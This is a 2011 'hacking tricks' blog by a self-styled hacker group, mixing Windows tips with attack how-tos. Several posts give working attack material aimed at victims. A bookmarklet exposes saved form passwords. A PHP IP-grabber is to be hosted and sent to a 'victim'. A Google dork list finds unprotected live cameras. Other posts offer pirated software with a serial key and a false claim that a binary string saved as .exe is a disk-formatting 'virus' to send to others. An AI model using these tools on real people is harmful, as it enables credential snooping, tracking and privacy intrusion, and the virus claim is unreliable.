Blog Hijau

BLACK CAT HACKS ORGANIZATION

BLACK CAT ORGANIZATION was built in 2006,with 2 hackers and now we have more than 2000 Hackers and Crackers.

WE ARE ANNONYMOUS

BLACK CAT HACKS ORGANIZATION is annonymous for all over the world.We are annonymous..

WE ARE HACKERS AND CRACKERS

In our Organization,many hackers are work for us.We also have lot of Crackers who crack sites,softwares and much more...

MISSION

We are PAKISTANIES and work against enimies of Pakistan.

RANKS

COMMAND > Diamond Lion > Gold Lion > Silver Lion > 8* > 7* > 6* > 5* > 4* > 3* > 2* > 1* > 3 Dot > 2 Dot > 1 Dot > Begginer

Wednesday, 30 November 2011

VMware Workstation 7 + Serial Key


            VMware workstaion is a virtual machine software which allows you to run multiple operating system virtually on same pc. VMware allow testing of live cd without first recording them on a physical disc.This is best tool for software developers and also for new learner who can experience linux and learn how to work on linux by virtually running on their operating system. You can test any operating system before installing it on you computer. It is great software and u must download it.


           If you like my post or find any difficulties in installing this software feel free to leave the comment. Below is the link for VMware with serial key.


Tuesday, 29 November 2011

What is phishing and how to be safe from phishing ?


    What is Phishing ?

                    Phishing is one of the type of hacking . It is a method of acquiring sensitive information such as username, password, bank information etc. Phishing page could be saif as an duplicate page of real one. Its look exactly similar as the real page.But when user enter sensitive information on such phishing page his information is send to the E-mail address provided in the phishing page or you can say the one who created that phishing page. Phishing page is mostly send via mail. Target of phishing are mostly social networking sites like facebook, orkut etc. Also Banks website to acquire credit card details,website like yahoo, gmail are also target of phishing.



    Example of Phishing scams:
  • Email asking you to login to your locked account to unlock it.
  • Email carrying a Link to sites like Facebook,yahoo etc and asking you to Login.
  • Emails containing some Information of your Interest and asking you to Login to Your Account.
   
     How to be safe from phishing ?
  • Never login to any of your account through link provided in the Email.
  • Go to real website dont click on any link posted anywhere. such as link posted on your facebook wall by friend or link provided in comments or link to ceratin website on any blog.
  • Check the URL of website before entering any sensitive information. Because the URL of phishing page is not same as the URL of  real one.
  • Real gmail page looks like gmail.com while phishing looks different somthing like gmail.anything.com

Is you antivirus working perfect ?


               This trick will let you detect whether your antivirus software is working or is just a waste. We will create a file which every antivirus sofware will detect as virus but dont worry it is harmless and will not harm your computer.

  • First open Notepad and copy below code into it.
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  •  Save the file as virus.exe
         As soon as you will run this file you antivirus will detect it as software. If not then you need to change your program.

Monday, 28 November 2011

Download Youtube Videos Without Any Software

download youtube videos
This is simple youtube trick which will allow you to download any youtube videos without any software or programme and in many different video formats such as mpeg4, 3gp, hd and many more from within the youtube site.

How To Download Youtube Videos ?

1. First Go to Youtube Homepage.
2. Then select the video you want to download. I will demonstrate with video url given below.
http://www.youtube.com/watch?v=_JAa3NvP6f4
  • Now add save or ss or kick before youtube and press enter.
3. After adding any of the above  keyword the above link will become.
http://www.saveyoutube.com/watch?v=_JAa3NvP6f4
Or
http://www.ssyoutube.com/watch?v=_JAa3NvP6f4
Or
http://www.kickyoutube.com/watch?v=_JAa3NvP6f4
 4. Now you will be redirected to a new page from where you can download youtube videos in any format of your choice. You may also download only the soundtrack of the video in mp3 format.

Saturday, 26 November 2011

Change your Ip in less then 1 minute

   
                     In my previous post i had show you how to Grab someone ip address now i will show you how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.


  • Click on "Start" in the bottom left corner of the screen.
  • Click on "RUN"
  • Type in "command" and click OK

      You should be now at MSDOS prompt Screen

  • Type "ipconfig /release" just like that, and press "enter"
  • Type "exit" and leave the prompt
  • Right-click on "Network Places" or "My Network Places" on your desktop.
  • Click on "properties"

     Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.

  •  Right click on "Local Area Connection" and click "properties"
  • Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
  • Click on "Use the following IP address" under the "General" tab
  • Create an IP address (It doesn't matter what it is)
  • Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
  • Press the "Ok" button here
  • Hit the "Ok" button again

     Now you should be back to the "Local Area Connection" screen.

  • Right-click back on "Local Area Connection" and go to properties again.
  • Go back to the "TCP/IP" settings
  • This time, select "Obtain an IP address automatically"
  • Click on "Ok"
  • Hit "Ok" again.
  • Now you have a New IP address.

Friday, 25 November 2011

Matrix Effect using notepad


        This is amazing notepad trick which will display matrix effect like you might have seen in movies, that is numbers flashes in green colour. Basically we will be creating a small batch file in notepad.

  • Go to Notepad and copy below codes
@echo off

color 02

:start

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto start
  • Save this file as matrix.bat 
  • Now open this file as see matrix effect on your screen.
        If you like my posts then subscribe below for such more tutorials.

Wednesday, 23 November 2011

Get password behind asterisks


           This is trick will let you see password behind asterisks. You might be thinking what is asterisks. It is dots or stars you see when you type password. This trick will let you see password behind asterisks. often people save their password on browser so this trick will let you get their password easily.

  • Go to the page that contain password in asterisks.
  • Now copy the following code.
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
  • Paste the code into address bar of the page.
  • Now you will get the password on that page.
      NOTE: This trick works on internet explorer and might works on old version of other 
                    web browser.

    Tuesday, 22 November 2011

    Open multiple yahoo on same PC


             This is very simple trick for windows xp users which let you open multiple yahoo messenger in same computer. It may be two three as many you want. I had not tried it but, It might also works on window 7 and windows vista. So below is the trick :



           1. Go to Start  >  Run
           2. Type in regedit and then press Enter .
           3. Navigate to HKEY_CURRENT_USER > Software > Yahoo > Pager > Test
           4. On the right side press right-click and choose new Dword value.
           5. Rename it as Plural.
           6. Now Double click and assign a decimal value of 1.
           7. Now you can open multilpe yahoo on same pc.

    Monday, 21 November 2011

    Enable facebook HTTPS


           
                    This is old trick but still if you are not aware of this then this is for you. Facebook has added new feature to browse it securely but is not set by default. Facebook has changed without any notification.Take a look at your URL (top box on your screen.). If you see "http" or just "www" instead of "https" you DO NOT have a secure session & can be hacked.To secure your facebook account just follow the below Steps.


           1. Go to Account 
           2. Then Account Settings 
           3. Then click on Security
           4. Check box (secure browsing)
           5. Click on Save changes.

    Sunday, 20 November 2011

    Open CD/DVD Rom From Desktop

       
                  This is simple script that let you open your CD/DVD Rom directly from your desktop. Follow below steps to do this :

    • Open Notepad and copy below codes in to it.
             Set oWMP = CreateObject("WMPlayer.OCX.7" )
             Set colCDROMs = oWMP.cdromCollection
             if colCDROMs.Count >= 1 then
             do
             For i = 0 to colCDROMs.Count - 1
             colCDROMs.Item(i).Eject
             Next ' cdrom
             For i = 0 to colCDROMs.Count - 1
             colCDROMs.Item(i).Eject
             Next ' cdrom
             loop
             End If
    •  Save the file as ejectcd.vbs and you will similar icon as below
    • Double click this saved file and it will eject you cd rom.
    • To stop this script go to Task manager > Process  and search for wscript.exe and click on END Process as shown in below image.


    Saturday, 19 November 2011

    Is Your Computer Male Or Female ?


             This is funny trick that let you know the gender of your computer whether it is male or female. This trick work on mostly all windows operating system. So let get started.

    How To Do ?

       1. Open Notepad and paste the following codes.
     CreateObject("SAPI.SpVoice").Speak"i love you"
       2. Save the file as gender.vbs
       3. Now, open the save file
       4. If you hear male voice then your computer is male and if you hear female voice then its female.

    More Interesting Tricks

       My computer is male what about you ?

    Friday, 18 November 2011

    Enable Registry Editor Disabled By Admin

    windows registry
    Windows registry contains settings for low level operating system component as well as applications running on windows. In this tutorial i will teach you to enable registry editor disabled by the admin. So lets do it.

    What Is Registry ?

    Windows registry is hierarchical database that stores configuration setting and option on microsoft windows operating system.It contains settings for low level operating system component as well as applications running on windows.

    Registry is also called as Brain of Windows which store all information in form of registry keys Technically known as DWORD or STRING or BINARY or MULTI_STRING values which stores data.

    How To Enable Registry Editor Disabled By Admin ?

     1. Open Notepad and copy below codes.
     REGEDIT4
     [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
     "DisableRegistryTools"=dword:00000000
     2. Now save the file as anything.reg (.reg is must)
     3. Double click the save file.
     4. Done !!

    Windows Edit You Would Like To Do 

    Thursday, 17 November 2011

    Make your computer talk what you type !

                  This is very good and interesting Visual Basic Script Trick which let your computer speaks whatever you type. There is no requirement of any software. Just follow below simple steps.

    • First open Notepad and copy below codes
         Dim message, sapi
          message=InputBox("What do you want me to say?","COOL HACKING TRICKS")
         Set sapi=CreateObject("sapi.spvoice")
         sapi.Speak message
    • Now save the notepad file as talk.vbs
    • Now close the notepad file and open it again.
    • Done !!!

    Wednesday, 16 November 2011

    List of Windows keyboard Shortcuts


    • ALT+- (ALT+hyphen) Displays the Multiple Document Interface (MDI) child window's System menu
    • ALT+ENTER View properties for the selected item
    • ALT+SPACEBAR Display the System menu for the active window
    • ALT+F4 Close the active item, or quit the active program
    • ALT+ESC Cycle through items in the order they were opened
    • ALT+Underlined letter Display the corresponding menu
    • ALT+TAB Switch between open items
    • BACKSPACE View the folder one level up in My Computer or Windows Explorer
    • CTRL+X Cut
    • CTRL+A Select all
    • CTRL+B Bold
    • CTRL+I Italics
    • CTRL+C Copy
    • CTRL+Z Undo
    • CTRL+O Open an item
    • CTRL+U Underline
    • CTRL+V Paste
    • CTRL while dragging Copy selected item
    • CTRL+F4 Close the active document
    • CTRL+SHIFT while dragging Create shortcut to selected iteM
    • CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word
    • CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph
    • CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word
    • CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph
    • SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin
    • ESC Cancel the current task
    • F1 Displays Help
    • F2 Rename selected item
    • F3 Search for a file or folder
    • F4 Display the Address bar list in My Computer or Windows Explorer
    • F5 Refresh the active window
    • F6 Cycle through screen elements in a window or on the desktop
    • F10 Activate the menu bar in the active program
    • SHIFT+F10 Display the shortcut menu for the selected item
    • CTRL+ESC Display the Start menu
    • SHIFT+CTRL+ESC Launches Task Manager
    • SHIFT when you insert a CD Prevent the CD from automatically playing
    • WIN Display or hide the Start menu
    • WIN+BREAK Display the System Properties dialog box
    • WIN+D Minimizes all Windows and shows the Desktop
    • WIN+E Open Windows Explorer
    • WIN+F Search for a file or folder
    • WIN+F+CTRL Search for computers
    • WIN+L Locks the desktop
    • WIN+M Minimize or restore all windows
    • WIN+R Open the Run dialog box
    • WIN+TAB Switch between open items

           Windows Explorer Shortcuts:
    • ALT+SPACEBAR - Display the current window�s system menu
    • SHIFT+F10 - Display the item's context menu
    • CTRL+ESC - Display the Start menu
    • ALT+TAB - Switch to the window you last used
    • ALT+F4 - Close the current window or quit
    • CTRL+A - Select all items
    • CTRL+X - Cut selected item(s)
    • CTRL+C - Copy selected item(s)
    • CTRL+V - Paste item(s)
    • CTRL+Z - Undo last action
    • CTRL+(+) - Automatically resize the columns in the right hand pane
    • TAB - Move forward through options
    • ALT+RIGHT ARROW - Move forward to a previous view
    • ALT+LEFT ARROW - Move backward to a previous view
    • SHIFT+DELETE - Delete an item immediately
    • BACKSPACE - View the folder one level up
    • ALT+ENTER - View an item�s properties
    • F10 - Activate the menu bar in programs
    • F6 - Switch between left and right panes
    • F5 - Refresh window contents
    • F3 - Display Find application
    • F2 - Rename selected item

           Internet Explorer Shortcuts:
    • CTRL+A - Select all items on the current page
    • CTRL+D - Add the current page to your Favorites
    • CTRL+E - Open the Search bar
    • CTRL+F - Find on this page
    • CTRL+H - Open the History bar
    • CTRL+I - Open the Favorites bar
    • CTRL+N - Open a new window
    • CTRL+O - Go to a new location
    • CTRL+P - Print the current page or active frame
    • CTRL+S - Save the current page
    • CTRL+W - Close current browser window
    • CTRL+ENTER - Adds the http://www. (url) .com
    • SHIFT+CLICK - Open link in new window
    • BACKSPACE - Go to the previous page
    • ALT+HOME - Go to your Home page
    • HOME - Move to the beginning of a document
    • TAB - Move forward through items on a page
    • END - Move to the end of a document
    • ESC - Stop downloading a page
    • F11 - Toggle full-screen view
    • F5 - Refresh the current page
    • F4 - Display list of typed addresses
    • F6 - Change Address bar and page focus
    • F1 - Display Internet Explorer Help
    • ALT+RIGHT ARROW - Go to the next page
    • SHIFT+CTRL+TAB - Move back between frames
    • SHIFT+F10 - Display a shortcut menu for a link
    • SHIFT+TAB - Move back through the items on a page
    • CTRL+TAB - Move forward between frames
    • CTRL+C - Copy selected items to the clipboard
    • CTRL+V - Insert contents of the clipboard
    • ENTER - Activate a selected link
    • HOME - Move to the beginning of a document
    • END - Move to the end of a document

    Rename your Recycle bin

          
           1. Go to Start > Run
           2. Type in regedit this will open Registry Editor.
           3. Go to HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
           4. Change "Recycle Bin" to whatever you want.

    .

    Fix windows xp corrupted file easily


                   Today i will show you how to easily fix Windows xp corrupted files. Its work perfectly on windows xp and might works on windows 7 and windows vista also. Just follow below instruction to fix your corrupted window.


         REQUIREMENTS
    • PC Running Windows xp
    • Windows XP CD

           HOW TO DO THAT ?
      • Place Windows XP cd in your CD/DVD drive.
      • Then Go to Start > Run 
      • Type in sfc /scannow
      • Now your XP will run fine.

      Tuesday, 15 November 2011

      Add cool Twitter flying bird to your blog


              Twitter being huge platform to share your latest post you can increase your blog traffic via twitter. More are your twitter follower greater is your chance of  good traffic from twitter. So to increase your twitter follower Add cute looking twitter bird to your blog. This bird fly from corner to corner of your blog and it looks cool. Follow below instructions to add yours now:


             1. Go to Blogger > Design > Edit Html
             2. Then search for </Body>
             3. Just above it paste following code.

      <script src='http://bloggerblogwidgets.googlecode.com/files/way2blogging.org-tripleflap.js' type='text/javascript'>
      </script>
      <script type='text/javascript'>
      var twitterAccount = &quot;ndark14&quot;;
      var tweetThisText = &quot; <data:blog.pageTitle/> : <data:blog.url/> &quot;;
      tripleflapInit();
      </script>

             4. In place of ndark14 write your twitter username.
             5. Now save your template and see twitter bird flying on your blog.

         If you feel any difficulty feel free to ask and if you like these just say than you !

      Monday, 14 November 2011

      How to block unblock websites ?

      • Go to Start and then Run.
      • Type in this C:\WINDOWS\system32\drivers\etc
      • Now you will see file name Host open that in Notepad.
      • Below "127.0.0.1 localhost" add IP address of site to be blocked.
      • To unblock any site just reversed the process.
         
            EXAMPLE
           127.0.0.1 localhost
           69.171.224.14    (This will block Facebook)
           NOTE: For each site you block just add "1" to the IP (127.0.0.1)

      Sunday, 13 November 2011

      Facebook Status update trick


                This is an amazing facebook trick which you would love to use. So the trick is to update your status with name of any app like Nasa, Iphone 5, HTC etc. Still confused just follow below instruction and clear your mind.


             1. First Login to your Facebook account.
             2. Copy below link into address bar as shown in the below picture.
       
      http://www.facebook.com/connect/prompt_feed.php?preview=true&display=touch&    api_key=XXXXXXXXX&target_id=YYYYYYYYYY

           
             3. In place on XXXX put api key given in below list and in place of YYYY put profile id of
                 person where you want to publish your message.
             4. Now you will be redirected to new screen as above enter your message and done.


            API KEY LIST  
      • Skynet (249284985083592)
      • iPhone (6628568379)
      • Blackberry (2254487659)
      • Palm (7081486362)
      • Sidekick (21810043296)
      • Sony Ericsson (38125372145)
      • Xbox LIVE (5747726667)
      • iPad (112930718741625)
      • Foursquare (86734274142)
      • Telegram (140881489259157)
      • Carrier Pigeon (130263630347328)
      • Morse Code (134929696530963)
      • Message in a Bottle (123903037653697)
      • Commodore 64 (138114659547999)
      • Your moms computer (132386310127809)
      • TRS-80 (134998549862981)
      • K.I.T.T. (129904140378622)
      • Mind Computer Interface (121111184600360)
      • eyePhone (110455835670222)
      • toaster (203192803063920)
      • microwave (0a5266c8844a1b09211e7eb38242ac2f)
      • Super Nintendo Entertainment System (235703126457431)
      • Gameboy Color (180700501993189)
      • GoD (256591344357588)
      • Glade Air Freshner (4aeb4db2e8df1cdb7f952b2269afb560)
      • Strawberry (a4c9fb1708a848c2241674531176209b)
      • The moon (221826277855257)
      • Dr. Pepper (eea90d40e1d12565695dbbbdbd5e965b)
      • Nintendo wii (243870508973644)
      • Alcohol (250335888312118)
      • Cheese (218791271497130)
      • iPod Nano (142039005875499)
      • Nintendo 64 (236264753062118)
      • Microsoft Excel (242740155751069)
      • Linux Ubuntu (220593361311050)
      • iPhone 5g (211333348912523)
      • My Bedroom (174811032586879)
      • Your Mums Bedroom (5f64bbc9ac2f12b983200925da461322)
      • Lamp (230755826955133)
      • Your moms anus (b625297b655f0b46c86b68f754b82121)
      • Refrigerator (250828364944350)
      • A potato (127926427295267)
      • Nasa Satellite (31d608d30292175bf7703149699ccb39)
      • Vibrator (eb4c6d1a60e19a7795da501e1f468035)
      • Sperm Whale (170318539700306)
      • Pogo Stick (185103391549701)
      • Banana Phone (1477a4cd29ec724a3de19be5d26e0389)
      • Google+ (4d8243dbb7064f88351fe6c809582320)
      • The Future (108372819220732)
      • Smoke Signal (134138923334682)
      • tin cans connected by string (242191299125647)
      • Pokedex (de3da265cf6976745bb1d60a8c198151)
      • Telepathy (ea01a57edb26cf1de143f09d45cfa913)
      • Typewriter (d3d554bf60297cb2c384e3d7cf5a066d)
      • Harry Potter (b8ebeb983f45eaa0bd5f4f66cad97654)
      • TARDIS (200439256674396)
      • Pip Boy (142806259133078)
      • Mind Control (1dc633368924b3b0b4d08e3f83230760)
      • Jedi Mind Control (240597869302110)
      • Telekinesis (224139600960217)
      • Post-It Note (115227201900831)
      • GLaDOS (246126362083515)
      • Ansible (185474028180003)
      • W.O.P.R (228373497202865)
      • Airwolf (123944137696757)
      • HMCS Belafonte (222345601140304)
      • HAPPY BIRTHDAY (60280877509)                                           
             Any problem feel free to ask question and if you like my post just say thanx it will take less then 5 sec. Enter your email in below box and get free tutorials daily.

      Saturday, 12 November 2011

      View or Hack Unprotected Live Cameras Using Google

      hack unprotected cam
      In this tutorial i will teach you to hack or view unprotected cam using a simple google trick. Using this trick you can see live view of streets in china or america. Inner view of some office and lot more. Lets dive into it.

      How To View Unprotected Cam ?       

           1. Go to Google and search for "inurl:view/view.shtml" (without quote).
               2. Now open any of the link from the search result and enjoy.
                 3. Below is the list of google dork you can use to see more cams.

          List Of Google Dork

          • inurl:/view.shtml
          • intitle:�Live View / - AXIS� | inurl:view/view.shtml^
          • inurl:ViewerFrame?Mode=
          • inurl:ViewerFrame?Mode=Refresh
          • inurl:axis-cgi/jpg
          • inurl:axis-cgi/mjpg (motion-JPEG)
          • inurl:view/indexFrame.shtml
          • inurl:view/index.shtml
          • inurl:view/view.shtml
          • intitle:start inurl:cgistart
          • intitle:�live view� intitle:axis
          • liveapplet
          • intitle:snc-z20 inurl:home/
          • intitle:liveapplet
          • intitle:�i-Catcher Console - Web Monitor�
          • intitle:axis intitle:�video server�
          • intitle:liveapplet inurl:LvAppl
          • intitle:�EvoCam� inurl:�webcam.html�
          • intitle:�Live NetSnap Cam-Server feed�
          • intitle:�Live View / - AXIS�
          • intitle:�Live View / - AXIS 206W�
          • intitle:�Live View / - AXIS 210?
          • inurl:indexFrame.shtml Axis
          • intitle:�Live View / - AXIS 206M�
          • inurl:�MultiCameraFrame?Mode=Motion�
          • allintitle:�Network Camera NetworkCamera�
          • intitle:�WJ-NT104 Main Page�
          • intext:�MOBOTIX M1? intext:�Open Menu�
          • intext:�MOBOTIX M10? intext:�Open Menu�
          • intext:�MOBOTIX D10? intext:�Open Menu�
          • intitle:�netcam live image�
          • intitle:snc-cs3 inurl:home/
          • intitle:snc-rz30 inurl:home/
          • intitle:�sony network camera snc-p1?
          • intitle:�sony network camera snc-m1?
          • site:.viewnetcam.com -www.viewnetcam.com
          • intitle:�Toshiba Network Camera� user login

          More Cool Hacking Tricks 

          Wednesday, 9 November 2011

          100+ Run commands List


          • Accessibility Options : access.cpl
          • Add Hardware : hdwwiz.cpl
          • Add / Remove Programs : appwiz.cpl
          • Administrative Tools : control admintools
          • Automatic Updates : wuaucpl.cpl
          • Wizard file transfer Bluethooth : fsquirt
          • Calculator : calc
          • Certificate Manager : certmgr.msc
          • Character : charmap
          • Checking disk : chkdsk
          • Manager of the album (clipboard) : clipbrd
          • Command Prompt : cmd
          • Service components (DCOM) : dcomcnfg
          • Computer Management : compmgmt.msc
          • DDE active sharing : ddeshare
          • Device Manager : devmgmt.msc
          • DirectX Control Panel (if installed) : directx.cpl
          • DirectX Diagnostic Utility : dxdiag
          • Disk Cleanup : cleanmgr
          • System Information : dxdiag
          • Disk Defragmenter : dfrg.msc
          • Disk Management : diskmgmt.msc
          • Partition manager : diskpart
          • Display Properties : control desktop
          • Properties of the display (2) : desk.cpl
          • Properties display (tab "appearance") : control color
          • Dr. Watson : drwtsn32
          • Manager v�rirficateur drivers : check
          • Event Viewer : Eventvwr.msc
          • Verification of signatures of files : sigverif
          • Findfast (if present) : findfast.cpl
          • Folder Options : control folders
          • Fonts (fonts) : control fonts
          • Fonts folder windows : fonts
          • Free Cell : freecell
          • Game Controllers : Joy.cpl
          • Group Policy (XP Pro) : gpedit.msc
          • Hearts (card game) : mshearts
          • IExpress (file generator. Cab) : IExpress
          • Indexing Service (if not disabled) : ciadv.msc
          • Internet Properties : inetcpl.cpl
          • IPConfig (display configuration) : ipconfig / all
          • IPConfig (displays the contents of the DNS cache) : ipconfig / displaydns
          • IPConfig (erases the contents of the DNS cache) : ipconfig / flushdns
          • IPConfig (IP configuration cancels maps) : ipconfig / release
          • IPConfig (renew IP configuration maps) : ipconfig / renew
          • Java Control Panel (if present) : jpicpl32.cpl
          • Java Control Panel (if present) : javaws
          • Keyboard Properties : control keyboard
          • Local Security Settings : secpol.msc
          • Local Users and Groups : lusrmgr.msc
          • Logout : logoff
          • Microsoft Chat : winchat
          • Minesweeper (game) : winmine
          • Properties of the mouse : control mouse
          • Properties of the mouse (2) : main.cpl
          • Network Connections : control NetConnect
          • Network Connections (2) : ncpa.cpl
          • Network configuration wizard : netsetup.cpl
          • Notepad : notepad
          • NView Desktop Manager (if installed) : nvtuicpl.cpl
          • Manager links : packager
          • Data Source Administrator ODBC : odbccp32.cpl
          • Screen Keyboard : OSK
          • AC3 Filter (if installed) : ac3filter.cpl
          • Password manager (if present) : Password.cpl
          • Monitor performance : perfmon.msc
          • Monitor performance (2) : perfmon
          • Dialing Properties (phone) : telephon.cpl
          • Power Options : powercfg.cpl
          • Printers and Faxes : control printers
          • Private Character Editor : eudcedit
          • Quicktime (if installed) : QuickTime.cpl
          • Regional and Language Options : intl.cpl
          • Editor of the registry : regedit
          • Remote desktop connection : mstsc
          • Removable Storage : ntmsmgr.msc
          • requests the operator to removable storage : ntmsoprq.msc
          • RSoP (traduction. ..) (XP Pro) : rsop.msc
          • Scanners and Cameras : sticpl.cpl
          • Scheduled Tasks : control schedtasks
          • Security Center : wscui.cpl
          • Console management services : services.msc
          • shared folders : fsmgmt.msc
          • Turn off windows : shutdown
          • Sounds and Audio Devices : mmsys.cpl
          • Spider (card game) : spider
          • Client Network Utility SQL server : cliconfg
          • System Configuration Editor : sysedit
          • System Configuration Utility : msconfig
          • System File Checker (SFC =) (Scan Now) : sfc / scannow
          • SFC (Scan next startup) : sfc / scanonce
          • SFC (Scan each d�marraget) : sfc / scanboot
          • SFC (back to default settings) : sfc / revert
          • SFC (purge cache files) : sfc / purgecache
          • SFC (define size CAHC x) : sfc / cachesize = x
          • System Properties : sysdm.cpl
          • Task Manager : taskmgr
          • Telnet client : telnet
          • User Accounts : nusrmgr.cpl
          • Utility Manager (Magnifier, etc) : utilman
          • Windows firewall (XP SP2) : firewall.cpl
          • Microsoft Magnifier : magnify
          • Windows Management Infrastructure : wmimgmt.msc
          • Protection of the accounts database : syskey
          • Windows update : wupdmgr
          • Introducing Windows XP (if not erased) : tourstart
          • Wordpad : write
          • Date and Time Properties : timedate.cpl

          Monday, 7 November 2011

          Hackers Underground Hand Book Completely Free

          hackers underground handbook
                      Hackers underground Handbook is really nice for begineers. It contain some begineers as well as advance hacking tutorials. You can ask for any Ebooks by commenting below i will provide you. If you like my post then subscribe below for such more great ebooks and tutorials Also like my Facebook Page. The content of book is listed below:

          • Concept of Hacking
          • Programming
          • Linux
          • Network Hacking 
          • Wireless Hacking
          • Windows Hacking
          • Web Hacking
          • Malware

          Transform your windows 7 to Mac os X


                              Ever wanted to experience the look of Mac Os X, If yes then here i brought you an amazing mac theme for your windows.This will give your computer a completely new look like mac. This is great theme to experience Mac Os X. Download the file from below link and enjoy mac os x theme.

          • Extract the file and run it as administrator.
          • Right click on file and click on Run as administrator.
          • Password for the rar file is tricks4u

          Saturday, 5 November 2011

          Create Binary Virus to Format Hard Disk

          Create Binary Virus to Format Hard Disk
          Today i will show you to make a virus to format Hard disk using binary code. You can send this file to your friend or enemy to format their Hard disk. But please don't try this on your own computer or else you will end up formatting your own computer.

          How To Create Virus To Format Hard Drive ?

             1. Copy the below codes into Notepad.
          01001011000111110010010101010101010000011111100000
             2. Save the file as Format.exe
             3. You just created virus to format Hard Drive. Enjoy !!!

          If for some reason this does not work for you then check out below tutorial


          Friday, 4 November 2011

          How To Grab Someone IP Address ?

          In this tutorial i will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.

          How To Hack Someone Ip Address ?

              1. Copy the below codes into Notepad and save it as Grab.php (.php is must) 

            <?php
            $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
            $img_number = imagecreate(400,95);
            $backcolor = imagecolorallocate($img_number,10,102,153);
            $textcolor = imagecolorallocate($img_number,255,255,255);

            imagefill($img_number,0,0,$backcolor);
            $number0 = " This is Your IP/Proxy";
            $number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
            $number2 = " Host/Proxy: $hostname";
            $number4 = " _________________________________";

            Imagestring($img_number,10,5,5,$number0,$textcolor);
            Imagestring($img_number,10,5,25,$number1,$textcolor);
            Imagestring($img_number,10,5,45,$number2,$textcolor);
            Imagestring($img_number,10,5,50,$number4,$textcolor);
            Imagestring($img_number,10,8,50,$number4,$textcolor);
            Imagestring($img_number,10,5,10,$number4,$textcolor);
            Imagestring($img_number,10,8,10,$number4,$textcolor);

            header("Content-type: image/png");
            imagepng($img_number);
            $file=fopen("Name-here-to-protect-the-File.txt","a");
            $file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
            fwrite($file, $file2);
            fclose($file);
            ?>

                  2. Now make Free account on any of  the free web hosting sites Ripway or on  My3gb .
                  3. Now Upload Grab.php to your web hosting site.
                  4. Copy the link of your  uploaded file and send it to victim.
                  5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
                  6. Enjoy you are Done !!

                Other Interesting Hacks Related To Ip Address

                Download Top 9 Best Hackers Movies

                     
                italian job poster
                  die hard poster       sword fish poster
                 
                tron poster   hackers poster       war games poster

                pirates of silicon valley poster   antitrust poster       sneakers poster 


                Keyboard Shortcuts For Facebook

                facebook keyboard shortcuts
                Facebook is one of the most popular social networking site where most of us spend hours chatting and surfing on facebook. So here are some usefull facebook keyboard shortcuts for Google chrome and Mozilla Firefox users.

                Mozilla Firefox

                • Shift+Alt+1: View your News Feed
                • Shift+Alt+2: View your own Profile
                • Shift+Alt+3: View pop-up of friend requests
                • Shift+Alt+4: View pop-up of messages
                • Shift+Alt+5: View pop-up of notifications
                • Shift+Alt+6: View Account Settings
                • Shift+Alt+7: View Privacy Settings
                • Shift+Alt+8: View Facebook�s own profile
                • Shift+Alt+9: Read latest Terms of Service agreement.
                • Shift+Alt+0: Open Facebook Help Center

                Google Chrome

                • Alt+1: View your News Feed
                • Alt+2: View your own Profile
                • Alt+3: View pop-up of friend requests
                • Alt+4: View pop-up of messages
                • Alt+5: View pop-up of notifications
                • Alt+6: View Account Settings
                • Alt+7: View Privacy Settings
                • Alt+8: View Facebook�s own profile
                • Alt+9: Read latest Terms of Service agreement.

                You May Also Like

                Thursday, 3 November 2011

                Download Windows 8 Developer Preview

                windows 8
                Experience the latest Microsoft operating system Window 8. Download the iso file from below link .Try windows 8 on your pc. You can also experience windows 8 virtually using VM ware Workstation.

                How To Get Windows 8 Developer Preview ?

                    REQUIREMENTS
                  • 1 GHz or faster 32-bit (x86) or 64-bit (x64) processor
                  • 1 GB RAM (32 bit) or 2 GB RAM (64 bit)
                  • 16 GB (32 bit) or 20 GB (64bit) Available Hardisk.
                  • DirectX 9 graphics device with WDDM 1.0 or higher drivers.
                  • Taking advantage of touch input requires a screen that supports multi-touch.
                      DOWNLOAD LINKS

                  Cool Smiley Add-on For Facebook Chat

                  facebook smileys
                  Today i will show you an amazing Google add-on for facebook smileys. This will let you use smileys easily in your facebook chat. I loved this addon hope you also like it. Follow below steps to get it now.

                  Add Facebook Smiley Add-On

                  1. Go to Facebook addon Link
                  2. Now click on Add to chrome
                  3. Done !!!

                    More Tricks And Tips